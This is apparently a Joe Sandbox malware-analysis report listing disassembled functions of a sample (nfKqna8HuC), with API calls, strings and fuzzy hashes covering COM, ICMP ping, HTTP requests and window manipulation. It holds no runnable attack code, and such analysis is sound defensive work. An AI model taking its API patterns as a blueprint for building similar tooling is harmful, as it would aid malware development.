SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 006594FE
SafeArrayAllocData.OLEAUT32(?), ref: 00659549
VariantInit.OLEAUT32(?), ref: 0065955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 0065957B
VariantCopy.OLEAUT32(?,?), ref: 006595BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 006595D2
VariantClear.OLEAUT32(?), ref: 006595E7
SafeArrayDestroyData.OLEAUT32(?), ref: 006595F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006595FD
VariantClear.OLEAUT32(?), ref: 0065960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0065961A

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 5ee69f1aa8e22f035af1d1b6bac5c9b53dc2747ab84e9a897bbc51e30611175e
Instruction ID: a389cb20f713cf8ff3d991df8ff16b01ab79658b532493706b6d51d69cda6f8d
Opcode Fuzzy Hash: 5ee69f1aa8e22f035af1d1b6bac5c9b53dc2747ab84e9a897bbc51e30611175e
Instruction Fuzzy Hash: 10412C71900219EFCB01EFA4DC449DEBBBAFF09355F008069F912A3251DB31AA59CFA5

Function 0067BB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0067BB5C
VariantInit.OLEAUT32(?), ref: 0067BC2D
VariantInit.OLEAUT32(?), ref: 0067BD2E
VariantClear.OLEAUT32(?), ref: 0067BD38
VariantClear.OLEAUT32(?), ref: 0067BD99

Strings

Null Object assignment in FOR..IN loop, xrefs: 0067BBBD, 0067BCEB, 0067BDA7
Incorrect Object type in FOR..IN loop, xrefs: 0067BD11
h?m, xrefs: 0067BB2D
|?m, xrefs: 0067BB34

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?m$|?m
API String ID: 2862541840-333645321
Opcode ID: bc5182a9da01b93535e17e187aca815b7122f0dee7c9cadc14f9204582e374d0
Instruction ID: 02c6b4b4c34578f90b59582426342eb7bc393750d99b8ba0f7214a7600807b62
Opcode Fuzzy Hash: bc5182a9da01b93535e17e187aca815b7122f0dee7c9cadc14f9204582e374d0
Instruction Fuzzy Hash: 66919F71A00219ABDF24DF94C844FEEBBBAEF45710F10D55AF919AB280DB709941CFA0

Function 0067ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 0062936C: __swprintf.LIBCMT ref: 006293AB
Part of subcall function 0062936C: __itow.LIBCMT ref: 006293DF

CoInitialize.OLE32 ref: 0067ADF6
CoUninitialize.OLE32 ref: 0067AE01
CoCreateInstance.OLE32(?,00000000,00000017,006AD8FC,?), ref: 0067AE61
IIDFromString.OLE32(?,?), ref: 0067AED4
VariantInit.OLEAUT32(?), ref: 0067AF6E
VariantClear.OLEAUT32(?), ref: 0067AFCF

Strings

Failed to create object, xrefs: 0067AE6C, 0067AF22
NULL Pointer assignment, xrefs: 0067AEA6
Invalid parameter, xrefs: 0067AEED

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 5ff72cc10bc36b5e91ab5fe1eccdc868c555a75ed1817057ad8863178b8d877c
Instruction ID: fcc9615ed983b62d121e93719aaf222a50c27efbfff2de334a8a8dd86bd42bd0
Opcode Fuzzy Hash: 5ff72cc10bc36b5e91ab5fe1eccdc868c555a75ed1817057ad8863178b8d877c
Instruction Fuzzy Hash: 72619A702087119FC710EFA4C844BAEBBEAAF89714F10851DF98A9B291C774ED45CB97

Function 00678107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00678168
inet_addr.WSOCK32(?), ref: 006781AD
gethostbyname.WSOCK32(?), ref: 006781B9
IcmpCreateFile.IPHLPAPI ref: 006781C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00678237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0067824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 006782C2
WSACleanup.WSOCK32 ref: 006782C8

Strings

Ping, xrefs: 006781EB

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: ec4f797e992edb242e32dd7a7df9b83b3e70aff8f4c898f319678b7db5094be1
Instruction ID: 851e7e7d5752222b60a7ba52b74ac496e222462e50b7836428d3293b95e82fce
Opcode Fuzzy Hash: ec4f797e992edb242e32dd7a7df9b83b3e70aff8f4c898f319678b7db5094be1
Instruction Fuzzy Hash: 9C51A1316447019FD750AF24DC49B6ABBE6AF49321F048829F96AD73A2DB30ED01CF85

Function 0066E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0066E396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0066E40C
GetLastError.KERNEL32 ref: 0066E416
SetErrorMode.KERNEL32(00000000,READY), ref: 0066E483

Strings

NOTREADY, xrefs: 0066E442
INVALID, xrefs: 0066E455
READONLY, xrefs: 0066E44E
READY, xrefs: 0066E45C
UNKNOWN, xrefs: 0066E43B

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 8e893735e33b90069638e5aed454c4b293709cc7a40e41194e509080a3ed2f36
Instruction ID: cb7360710ae5dd038fd2f69ea30456f85888f562cd417b660022277b16e72771
Opcode Fuzzy Hash: 8e893735e33b90069638e5aed454c4b293709cc7a40e41194e509080a3ed2f36
Instruction Fuzzy Hash: D1316139A002199FDB01EF68D945AFDB7F6EF55310F14802AE506EB391DA71AA02CB91

Function 0065B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0065B98C
GetDlgCtrlID.USER32 ref: 0065B997
GetParent.USER32 ref: 0065B9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 0065B9B6
GetDlgCtrlID.USER32(?), ref: 0065B9BF
GetParent.USER32(?), ref: 0065B9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 0065B9DE

Strings

ListBox, xrefs: 0065B949
ComboBox, xrefs: 0065B911

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: f64573f02f48e3c4687c0b9803685700b71581fd4b6a4dc7e2d6b95412108285
Instruction ID: 85bda3f2b9dfbbfc6595ea866a9d3858952424f761ab43d59d8a9798fd5f1b1a
Opcode Fuzzy Hash: f64573f02f48e3c4687c0b9803685700b71581fd4b6a4dc7e2d6b95412108285
Instruction Fuzzy Hash: A421F574900104BFDB04ABA4DC86EFEBB76EF5A311F10111AFA52932E1DBB45819DF24

Function 0065B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0065BA73
GetDlgCtrlID.USER32 ref: 0065BA7E
GetParent.USER32 ref: 0065BA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 0065BA9D
GetDlgCtrlID.USER32(?), ref: 0065BAA6
GetParent.USER32(?), ref: 0065BAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 0065BAC5

Strings

ListBox, xrefs: 0065BA32
ComboBox, xrefs: 0065B9FA

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: f999b9457e7da39384d57272994361df4dc992ab6a24f975a0dd1ddf04589fd3
Instruction ID: 911fd7ebc579aeb41515e6a9c76c0bfbf05c31c6a9afef7bd5832d28c233f6b7
Opcode Fuzzy Hash: f999b9457e7da39384d57272994361df4dc992ab6a24f975a0dd1ddf04589fd3
Instruction Fuzzy Hash: 4421B0B4A00108BFDB04AFA4DC85EFEBB7AEF45301F141019F952A7291DBB5591ADF24

Function 0065BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0065BAE3
GetClassNameW.USER32(00000000,?,00000100), ref: 0065BAF8
_wcscmp.LIBCMT ref: 0065BB0A
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0065BB85

Strings

details, xrefs: 0065BB33
SHELLDLL_DefView, xrefs: 0065BB04
largeicons, xrefs: 0065BB19
smallicons, xrefs: 0065BB4D
list, xrefs: 0065BB67

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 1afbc1e0906a24c4425efe699655658326a6f775fff095b5c3aef0c79bbe36e6
Instruction ID: 5fc1884b622257045d7a4575dd6b61acd198f39e16eb1474e4f7e4fe80260512
Opcode Fuzzy Hash: 1afbc1e0906a24c4425efe699655658326a6f775fff095b5c3aef0c79bbe36e6
Instruction Fuzzy Hash: BA110676608707FAFB246624DC17DE6379FDB21720F201026FE05E41D5FFE168564918

Function 0067B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0067B2D5
CoInitialize.OLE32(00000000), ref: 0067B302
CoUninitialize.OLE32 ref: 0067B30C
GetRunningObjectTable.OLE32(00000000,?), ref: 0067B40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 0067B539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0067B56D
CoGetObject.OLE32(?,00000000,006AD91C,?), ref: 0067B590
SetErrorMode.KERNEL32(00000000), ref: 0067B5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0067B623
VariantClear.OLEAUT32(006AD91C), ref: 0067B633

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: fe1861a29fbb3e821e9cb1569fa50723f006c8dde07c7734f7ab5a438b710072
Instruction ID: dc9e74c0b3c14a8e3671b84fd16aa0efacf44acab60c6e40f156ea61bdb4b1e9
Opcode Fuzzy Hash: fe1861a29fbb3e821e9cb1569fa50723f006c8dde07c7734f7ab5a438b710072
Instruction Fuzzy Hash: C2C123B1608305AFD700DF64C884A6BB7EABF89308F04995DF58A9B251DB71ED05CB52

Function 00664025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00664047
GetForegroundWindow.USER32(00000000,?,?,?,?,?,006630A5,?,00000001), ref: 0066405B
GetWindowThreadProcessId.USER32(00000000), ref: 00664062
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006630A5,?,00000001), ref: 00664071
GetWindowThreadProcessId.USER32(?,00000000), ref: 00664083
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,006630A5,?,00000001), ref: 0066409C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006630A5,?,00000001), ref: 006640AE
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,006630A5,?,00000001), ref: 006640F3
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,006630A5,?,00000001), ref: 00664108
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,006630A5,?,00000001), ref: 00664113

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: ad73b8b80d31306d153e789abac839f8afb5256aa0448771aa1cd079dc356b73
Instruction ID: d808e4b24511b81d2a94a2ccb8a8fe5e0d86abb1b30ff6a5d7c4c988e18ebc0c
Opcode Fuzzy Hash: ad73b8b80d31306d153e789abac839f8afb5256aa0448771aa1cd079dc356b73
Instruction Fuzzy Hash: DE3181B1500324ABDB10DF55DC8ABB9B7ABAB66711F209005F905DB390CFB4ED808F60

Function 0069DD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0063B496
SetTextColor.GDI32(?,000000FF), ref: 0063B4A0
SetBkMode.GDI32(?,00000001), ref: 0063B4B5
GetStockObject.GDI32(00000005), ref: 0063B4BD
GetClientRect.USER32(?), ref: 0069DD63
SendMessageW.USER32(?,00001328,00000000,?), ref: 0069DD7A
GetWindowDC.USER32(?), ref: 0069DD86
GetPixel.GDI32(00000000,?,?), ref: 0069DD95
ReleaseDC.USER32(?,00000000), ref: 0069DDA7
GetSysColor.USER32(00000005), ref: 0069DDC5

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: dc705eb548ef4d91ddb19a2c6a8fa21d000a5523013f1947abd92609c670f8e4
Instruction ID: fd65ae1ac261a98a53bdda45eb3a36f3f37e3bcebde8c1e942f6b3a64b83d33f
Opcode Fuzzy Hash: dc705eb548ef4d91ddb19a2c6a8fa21d000a5523013f1947abd92609c670f8e4
Instruction Fuzzy Hash: 96114C31500205AFDB216FA4EC08BE97BA7EB06325F10A665FA66955E2CB311942DF20

Function 00623093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 006230DC
CoUninitialize.OLE32(?,00000000), ref: 00623181
UnregisterHotKey.USER32(?), ref: 006232A9
DestroyWindow.USER32(?), ref: 00695079
FreeLibrary.KERNEL32(?), ref: 006950F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00695125

Strings

close all, xrefs: 006230D7

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 36050371de8710b7ec939f463a7d75a32d95db333cdc0aa68f9e57a2bd4cf1be
Instruction ID: 8d8e80b299ca81e7666b71e5f6e3aabafdb6fa693b0086ca936ff59dd8363ca3
Opcode Fuzzy Hash: 36050371de8710b7ec939f463a7d75a32d95db333cdc0aa68f9e57a2bd4cf1be
Instruction Fuzzy Hash: 1D914D30600A22CFCB45EF14D895AA8F3AAFF15304F5481ADE50A67762DF34AE56CF58

Function 0063CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 0063CC15

Part of subcall function 0063CCCD: GetClientRect.USER32(?,?), ref: 0063CCF6
Part of subcall function 0063CCCD: GetWindowRect.USER32(?,?), ref: 0063CD37
Part of subcall function 0063CCCD: ScreenToClient.USER32(?,?), ref: 0063CD5F

GetDC.USER32 ref: 0069D137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0069D14A
SelectObject.GDI32(00000000,00000000), ref: 0069D158
SelectObject.GDI32(00000000,00000000), ref: 0069D16D
ReleaseDC.USER32(?,00000000), ref: 0069D175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0069D200

Strings

U, xrefs: 0069D0D5

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 5755304d0e6221baed4fc18becfb72232b5f9bc10659a420e804d3b199b027ca
Instruction ID: d9bac798f4e842e0372dffb2bff0563341d540bcf5b3770a3a2b2e3dce02575a
Opcode Fuzzy Hash: 5755304d0e6221baed4fc18becfb72232b5f9bc10659a420e804d3b199b027ca
Instruction Fuzzy Hash: 8971EC31400205DFCF219F64CC81AEA7BBBFF49364F14526AFD566A6A6C7308842DFA0

Function 0068ECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0063B34E: GetWindowLongW.USER32(?,000000EB), ref: 0063B35F

Part of subcall function 0063B63C: GetCursorPos.USER32(000000FF), ref: 0063B64F
Part of subcall function 0063B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0063B66C
Part of subcall function 0063B63C: GetAsyncKeyState.USER32(00000001), ref: 0063B691
Part of subcall function 0063B63C: GetAsyncKeyState.USER32(00000002), ref: 0063B69F

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0068ED3C
ImageList_EndDrag.COMCTL32 ref: 0068ED42
ReleaseCapture.USER32 ref: 0068ED48
SetWindowTextW.USER32(?,00000000), ref: 0068EDF0
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0068EE03
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0068EEDC

Strings

@GUI_DROPID, xrefs: 0068EE33
@GUI_DRAGFILE, xrefs: 0068EE77

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: d0b7720b07592b717d5acf79e96cd3f8ea3758a06d05904feb212e69d210a38b
Instruction ID: d702930df1061df152157eb5b35368cc4284865310f593b93fbfe6cd8d05c6ed
Opcode Fuzzy Hash: d0b7720b07592b717d5acf79e96cd3f8ea3758a06d05904feb212e69d210a38b
Instruction Fuzzy Hash: 26519870204304AFD710EF24DC9AFAA77E6AB89314F005A1DF9959B2E2DB71A944CF52

Function 006745C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006745FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0067462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0067466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00674682
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0067468F
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 006746BF
InternetCloseHandle.WININET(00000000), ref: 00674706

Part of subcall function 00675052: GetLastError.KERNEL32(?,?,006743CC,00000000,00000000,00000001), ref: 00675067

Strings

, xrefs: 006746B8

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

